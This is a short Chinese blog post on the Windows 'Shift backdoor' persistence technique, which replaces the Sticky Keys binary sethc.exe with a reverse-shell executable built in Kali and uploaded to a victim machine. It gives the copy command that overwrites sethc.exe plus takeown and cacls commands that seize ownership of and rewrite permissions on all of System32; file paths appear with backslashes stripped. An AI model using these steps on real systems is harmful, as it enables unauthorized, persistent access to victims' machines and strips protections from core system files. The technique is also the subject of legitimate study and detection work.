windows权限维持之shift后门网站首页 技术杂谈

windows权限维持之shift后门

安全~小菜鸡 2024-06-03 10:56:09

简介windows权限维持之shift后门

原理：沾滞键的目的是为了帮助那些按键有困难的人设计的，在Windows系统下连续按5次shift键后，系统就会执行C:WindowsSystem32下的sethc.exe，也就是启用了沾滞键，但是当我们将shell.exe文件把sethc.exe文件通过更改名称给覆盖掉，当我们连续按下5次shift后执行的就是“shell.exe”文件了。

1、kali制作反弹木马,上传木马至受害机

2、shell.exe覆盖sethc.exe

copy C:WINDOWSsystem32shell.exe C:windowssystem32sethc.exe

//如果没指定生成的文件，会直接覆盖copy的第二个参数，相当于将第二个参数换成了第一个参数，但是文件外部名称没变

出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员，命令如下

takeown /f c:windowssystem32*.* /a /r /d y # 获取整个文件夹及其下面子目录文件的所属权

cacls c:windowssystem32*.* /T /E /G administrators:F # 将所有c:windowssystem32目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)

成功覆盖